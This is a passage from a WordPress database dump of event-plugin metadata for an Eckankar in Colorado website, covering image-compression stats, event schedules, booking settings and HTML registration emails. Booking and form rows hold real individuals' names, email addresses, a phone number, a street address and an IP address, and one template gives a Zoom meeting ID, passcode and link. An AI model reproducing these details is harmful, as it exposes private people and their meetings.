WP-Optimize'),(166677,266884,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:112651;s:12:\"smushed-size\";i:109018;s:15:\"savings-percent\";d:3.23;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:112651;s:10:\"compressed\";i:109018;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:27921;s:10:\"compressed\";i:27787;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:45318;s:10:\"compressed\";i:45060;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:29773;s:10:\"compressed\";i:29698;}s:8:\"tileview\";a:2:{s:8:\"original\";i:37597;s:10:\"compressed\";i:37282;}}}'),(166676,266884,'smush-complete','1'),(166657,266883,'mec_event_status','EventScheduled'),(166646,266883,'mec_tickets','a:0:{}'),(166647,266883,'mec_fees_global_inheritance','1'),(166648,266883,'mec_fees','a:0:{}'),(166649,266883,'mec_ticket_variations_global_inheritance','1'),(166650,266883,'mec_ticket_variations','a:0:{}'),(166651,266883,'mec_reg_fields_global_inheritance','1'),(166652,266883,'mec_reg_fields','a:0:{}'),(166653,266883,'mec_bfixed_fields','a:0:{}'),(166654,266883,'mec_op','a:0:{}'),(166655,266883,'mec_fields','a:0:{}'),(166656,266883,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(166871,266907,'_wp_attached_file','2022/07/booklets-only-2.png'),(166872,266907,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:620;s:6:\"height\";i:503;s:4:\"file\";s:27:\"2022/07/booklets-only-2.png\";s:8:\"filesize\";i:293543;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"booklets-only-2-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:73571;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"booklets-only-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29504;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"booklets-only-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:97433;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"booklets-only-2-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:154223;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"booklets-only-2-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:109179;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"booklets-only-2-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:126172;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166818,261495,'_edit_last','2'),(166819,261495,'mec_location_id','0'),(166820,261495,'mec_additional_location_ids','a:0:{}'),(166821,261495,'mec_organizer_id','0'),(166822,261495,'mec_additional_organizer_ids','a:0:{}'),(166576,266874,'smush-info','The file was compressed from 68.91 KB to 68.91 KB saving 0 percent using WP-Optimize'),(166578,266874,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70566;s:12:\"smushed-size\";i:70566;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:5:{s:6:\"medium\";a:2:{s:8:\"original\";i:14321;s:10:\"compressed\";i:14219;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6940;s:10:\"compressed\";i:6874;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20355;s:10:\"compressed\";i:20232;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24213;s:10:\"compressed\";i:23951;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24537;s:10:\"compressed\";i:24515;}}}'),(166577,266874,'smush-complete','1'),(193897,269231,'smush-info','The file was compressed from 321.00 KB to 295.36 KB, saving 7.99 percent, using WP-Optimize'),(193896,269231,'smush-complete','1'),(164894,266813,'protect_children',''),(164895,266813,'mec_color',''),(164896,266813,'mec_location_id','146'),(164897,266813,'mec_dont_show_map','0'),(164898,266813,'mec_organizer_id','1'),(164899,266813,'mec_read_more',''),(164900,266813,'mec_more_info',''),(164901,266813,'mec_more_info_title',''),(164902,266813,'mec_more_info_target','_self'),(164903,266813,'mec_cost',''),(164904,266813,'mec_currency','a:0:{}'),(164905,266813,'mec_additional_organizer_ids','a:0:{}'),(164906,266813,'mec_additional_location_ids','a:0:{}'),(164907,266813,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-08\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-08\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(164908,266813,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(164909,266813,'mec_certain_weekdays','a:0:{}'),(164910,266813,'mec_allday','0'),(164911,266813,'one_occurrence','0'),(164912,266813,'mec_hide_time','0'),(164913,266813,'mec_hide_end_time','0'),(164914,266813,'mec_comment',''),(164915,266813,'mec_timezone','global'),(164916,266813,'mec_countdown_method','global'),(164917,266813,'mec_public','1'),(164918,266813,'mec_start_date','2022-07-08'),(164919,266813,'mec_start_time_hour','6'),(164920,266813,'mec_start_time_minutes','30'),(164921,266813,'mec_start_time_ampm','PM'),(164922,266813,'mec_start_day_seconds','66600'),(164923,266813,'mec_end_date','2022-07-08'),(164924,266813,'mec_end_time_hour','7'),(164925,266813,'mec_end_time_minutes','30'),(164926,266813,'mec_end_time_ampm','PM'),(164927,266813,'mec_end_day_seconds','70200'),(164928,266813,'mec_repeat_status','0'),(164929,266813,'mec_repeat_type',''),(164930,266813,'mec_repeat_interval','1'),(164931,266813,'mec_repeat_end',''),(164932,266813,'mec_repeat_end_at_occurrences',''),(164933,266813,'mec_repeat_end_at_date',''),(164934,266813,'mec_advanced_days','a:0:{}'),(164935,266813,'mec_in_days',''),(164936,266813,'mec_not_in_days',''),(164937,266813,'mec_hourly_schedules','a:0:{}'),(164938,266813,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(164939,266813,'mec_tickets','a:0:{}'),(164940,266813,'mec_fees_global_inheritance','1'),(164941,266813,'mec_fees','a:0:{}'),(164942,266813,'mec_ticket_variations_global_inheritance','1'),(164943,266813,'mec_ticket_variations','a:0:{}'),(164944,266813,'mec_reg_fields_global_inheritance','1'),(164945,266813,'mec_reg_fields','a:0:{}'),(164946,266813,'mec_bfixed_fields','a:0:{}'),(164947,266813,'mec_op','a:0:{}'),(164948,266813,'mec_fields','a:0:{}'),(164949,266813,'mec_event_status','EventScheduled'),(164950,266813,'mec_moved_online_link',''),(164951,266813,'mec_cancelled_reason',''),(164952,266813,'mec_display_cancellation_reason_in_single_page',''),(164953,266813,'boldgrid_hide_page_title','0'),(164954,266813,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(164955,266813,'passster_activate_global_protection',NULL),(164956,266813,'passster_activate_protection',NULL),(164957,266813,'passster_protection_type','password'),(164960,266813,'_dp_original','266104'),(164959,266813,'boldgrid_in_page_containers','1'),(164961,266813,'_edit_lock','1655868881:2'),(168360,267101,'boldgrid_hide_page_title','0'),(168359,267101,'mec_display_cancellation_reason_in_single_page',''),(168358,267101,'mec_cancelled_reason',''),(168357,267101,'mec_moved_online_link',''),(168356,267101,'mec_event_status','EventScheduled'),(168355,267101,'mec_fields','a:0:{}'),(168354,267101,'mec_op','a:0:{}'),(168353,267101,'mec_bfixed_fields','a:0:{}'),(168352,267101,'mec_reg_fields','a:0:{}'),(168351,267101,'mec_reg_fields_global_inheritance','1'),(168350,267101,'mec_ticket_variations','a:0:{}'),(168349,267101,'mec_ticket_variations_global_inheritance','1'),(168348,267101,'mec_fees','a:0:{}'),(168346,267101,'mec_tickets','a:0:{}'),(168347,267101,'mec_fees_global_inheritance','1'),(166983,266948,'mec_gateway','MEC_gateway_free'),(166984,266948,'mec_gateway_label','Free'),(168345,267101,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(166982,266948,'mec_price','0'),(166981,266948,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"47.12.99.86\";}}'),(166980,266948,'mec_ticket_price_1','0'),(166979,266948,'mec_booking_location','144'),(166978,266948,'mec_book_date_submit','20220725161242'),(166977,266948,'mec_attention_time_end','1663704000'),(166976,266948,'mec_attention_time_start','1663700400'),(166975,266948,'mec_attention_time','1663700400:1663704000'),(166974,266948,'mec_other_dates','a:0:{}'),(166973,266948,'mec_all_dates','a:0:{}'),(166972,266948,'mec_booking_time','2022-07-25 16:12:42'),(166971,266948,'mec_ticket_id',',1,'),(166970,266948,'mec_date','1663700400:1663704000'),(166969,266948,'mec_event_id','266611'),(166957,266947,'_field_35','BOULDER'),(166958,266947,'_field_36','CO'),(166959,266947,'_field_37','US'),(166960,266947,'_field_39',''),(166961,266947,'_form_id','4'),(166962,266947,'_seq_num','24'),(166963,266948,'mec_transaction_id','NVE31441'),(166964,266948,'mec_user_id','1000036'),(166965,266948,'mec_verified','1'),(166966,266948,'mec_verification_key','aa2b6586dd19c0f584b365022b52e02a'),(166967,266948,'mec_cancellation_key','094e2fd3157dbd6c437a590fa1b4e949'),(166968,266948,'mec_confirmed','1'),(166956,266947,'_field_34','5960 GUNBARREL AVENUE APT E'),(166955,266947,'_field_33','rhoann9@gmail.com'),(166954,266947,'_field_32','(303) 946-0436'),(166952,266947,'_field_30','Rhonda'),(166953,266947,'_field_31','Miller'),(168227,267092,'mec_more_info_target','_self'),(165033,266815,'mec_color',''),(165034,266815,'mec_location_id','118'),(165035,266815,'mec_dont_show_map','0'),(165036,266815,'mec_organizer_id','1'),(165037,266815,'mec_read_more',''),(165038,266815,'mec_more_info',''),(165039,266815,'mec_more_info_title',''),(165040,266815,'mec_more_info_target','_self'),(165041,266815,'mec_cost',''),(165042,266815,'mec_currency','a:0:{}'),(165043,266815,'mec_additional_organizer_ids','a:0:{}'),(165044,266815,'mec_additional_location_ids','a:0:{}'),(165045,266815,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-03\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-03\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165046,266815,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165047,266815,'mec_certain_weekdays','a:0:{}'),(165048,266815,'mec_allday','0'),(165049,266815,'one_occurrence','0'),(165050,266815,'mec_hide_time','0'),(165051,266815,'mec_hide_end_time','0'),(165052,266815,'mec_comment',''),(165053,266815,'mec_timezone','global'),(165054,266815,'mec_countdown_method','global'),(165055,266815,'mec_public','1'),(165056,266815,'mec_start_date','2022-07-03'),(165057,266815,'mec_start_time_hour','10'),(165058,266815,'mec_start_time_minutes','30'),(165059,266815,'mec_start_time_ampm','AM'),(165060,266815,'mec_start_day_seconds','37800'),(165061,266815,'mec_end_date','2022-07-03'),(165062,266815,'mec_end_time_hour','11'),(165063,266815,'mec_end_time_minutes','30'),(165064,266815,'mec_end_time_ampm','PM'),(165065,266815,'mec_end_day_seconds','84600'),(165066,266815,'mec_repeat_status','0'),(165067,266815,'mec_repeat_type',''),(165068,266815,'mec_repeat_interval','1'),(165069,266815,'mec_repeat_end',''),(165070,266815,'mec_repeat_end_at_occurrences',''),(165071,266815,'mec_repeat_end_at_date',''),(165072,266815,'mec_advanced_days','a:0:{}'),(165073,266815,'mec_in_days',''),(165074,266815,'mec_not_in_days',''),(165075,266815,'mec_hourly_schedules','a:0:{}'),(165076,266815,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165077,266815,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(165078,266815,'mec_fees_global_inheritance','1'),(165079,266815,'mec_fees','a:0:{}'),(165080,266815,'mec_ticket_variations_global_inheritance','1'),(165081,266815,'mec_ticket_variations','a:0:{}'),(165082,266815,'mec_reg_fields_global_inheritance','1'),(165083,266815,'mec_reg_fields','a:0:{}'),(165084,266815,'mec_bfixed_fields','a:0:{}'),(165085,266815,'mec_op','a:0:{}'),(165086,266815,'mec_fields','a:0:{}'),(165087,266815,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9914:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 